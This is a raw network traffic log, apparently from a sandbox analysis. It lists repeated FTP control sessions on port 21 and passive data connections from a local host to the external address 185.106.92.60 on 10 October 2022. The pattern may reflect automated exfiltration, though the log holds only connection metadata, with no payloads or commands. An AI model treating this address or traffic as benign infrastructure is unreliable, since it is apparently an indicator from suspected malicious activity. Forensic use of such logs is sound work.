                                                                                                                                    Oct 10, 2022 06:02:46.116936922 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.117185116 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.117578983 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.117650986 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.117722034 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.141066074 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.141172886 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.141333103 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.164885998 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.165074110 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.165358067 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.188299894 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.188419104 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.188714027 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.212045908 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.212150097 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.212567091 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.235399961 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.235630989 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.237433910 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.261279106 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.261421919 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.262234926 CEST4983064583192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.284852028 CEST6458349830185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.284985065 CEST4983064583192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.285289049 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.309276104 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.309504986 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.315135002 CEST4983064583192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.337758064 CEST6458349830185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.337946892 CEST6458349830185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.338047028 CEST4983064583192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.338699102 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.338768959 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.339008093 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.361357927 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.361594915 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.361679077 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.475114107 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.498243093 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.498358011 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.524415016 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.524501085 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.524732113 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.524786949 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.524904013 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.524966002 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.525048971 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.547904015 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.548012018 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.548218966 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.571221113 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.571345091 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.571521997 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.594746113 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.594933987 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.596035957 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.619544983 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.619669914 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.628968954 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.652333021 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.652448893 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.654973984 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.678620100 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.678705931 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.679181099 CEST4983264584192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.703563929 CEST6458449832185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.703735113 CEST4983264584192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.704598904 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.728056908 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.728184938 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.728748083 CEST4983264584192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.752537966 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.752665043 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.752791882 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.753201962 CEST6458449832185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.753424883 CEST6458449832185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.753506899 CEST4983264584192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.775681973 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.775844097 CEST2149831185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.775929928 CEST4983121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.992535114 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.016804934 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.017070055 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.043735027 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.043795109 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.043828964 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.043947935 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.043947935 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.184973955 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.207954884 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.208209038 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.239608049 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.262922049 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.263046026 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.307113886 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.330303907 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.330516100 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.367686987 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.391416073 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.391554117 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.393978119 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.416878939 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.416985035 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.474813938 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.499396086 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.499505043 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.501808882 CEST4983464585192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.524472952 CEST6458549834185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.524616957 CEST4983464585192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.524908066 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.548566103 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.548697948 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.589509964 CEST4983464585192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.611892939 CEST6458549834185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.612070084 CEST6458549834185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.612153053 CEST4983464585192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.612763882 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.613843918 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.615113020 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.637280941 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.637356997 CEST2149833185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.637428045 CEST4983321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.913538933 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.939655066 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.943476915 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.973403931 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.973604918 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.973804951 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:47.973946095 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:47.973994017 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.397860050 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.424861908 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.425481081 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.432049990 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.457561970 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.457642078 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.457820892 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.481647015 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.484795094 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.485728979 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.509646893 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.513477087 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.548249960 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.574343920 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.574434996 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.575366020 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.601413012 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.601630926 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.602262974 CEST4983664587192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.624660969 CEST6458749836185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.624854088 CEST4983664587192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.663949966 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.688281059 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.688414097 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.689085007 CEST4983664587192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.711536884 CEST6458749836185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.711837053 CEST6458749836185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.711944103 CEST4983664587192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.714183092 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.714260101 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.758981943 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.785635948 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.785825014 CEST2149835185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:48.785903931 CEST4983521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:48.894315004 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:51.901771069 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:51.927103043 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:51.928345919 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:51.957046032 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:51.957101107 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:51.957119942 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:51.957300901 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:51.957819939 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:51.982935905 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:51.985856056 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:51.988193035 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.012938023 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.017271996 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.017467976 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.042597055 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.045850039 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.046021938 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.071162939 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.073827028 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.075490952 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.126398087 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.126604080 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.127965927 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.153130054 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.153337002 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.153789997 CEST4983864589192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.178337097 CEST6458949838185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.178555965 CEST4983864589192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.178929090 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.203645945 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.203871012 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.208028078 CEST4983864589192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.232017040 CEST6458949838185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.232053995 CEST6458949838185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.232183933 CEST4983864589192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.234105110 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.234241962 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.234420061 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.259005070 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.259047031 CEST2149837185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.259130955 CEST4983721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.361053944 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.383632898 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.385925055 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.411364079 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.411391973 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.411405087 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.411549091 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.419194937 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.441860914 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.442102909 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.442368031 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.464889050 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.469911098 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.470108986 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.492786884 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.493902922 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.494193077 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.517066002 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.517899990 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.519622087 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.542170048 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.542478085 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.543791056 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.566807032 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.567074060 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.567513943 CEST4984064590192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.592966080 CEST6459049840185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.593445063 CEST4984064590192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.593789101 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.618432045 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.618618011 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.626904964 CEST4984064590192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.651597023 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.651639938 CEST6459049840185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.651812077 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.652285099 CEST6459049840185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.652376890 CEST4984064590192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.652544022 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.674771070 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.674808979 CEST2149839185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.674926996 CEST4983921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.783253908 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.805915117 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.806082010 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.831484079 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.831655979 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.831695080 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.831744909 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.832030058 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.832109928 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.832232952 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.855437994 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.855716944 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.856302977 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.878905058 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.879004955 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.879194021 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.901838064 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.902038097 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.902280092 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.925180912 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.925415039 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.926002979 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.949115038 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.949276924 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.951880932 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.975157022 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.975263119 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.975513935 CEST4984264591192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.999025106 CEST6459149842185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:52.999238968 CEST4984264591192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:52.999691010 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.023708105 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.023941040 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.025002003 CEST4984264591192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.048978090 CEST6459149842185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.049004078 CEST6459149842185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.049019098 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.049189091 CEST4984264591192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.049222946 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.049429893 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.071681976 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.071712971 CEST2149841185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.071866035 CEST4984121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.203296900 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.227936029 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.228209972 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.258516073 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.258703947 CEST2149843185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:53.258740902 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.258778095 CEST4984321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:53.258958101 CEST2149843185.106.92.60192.168.2.3
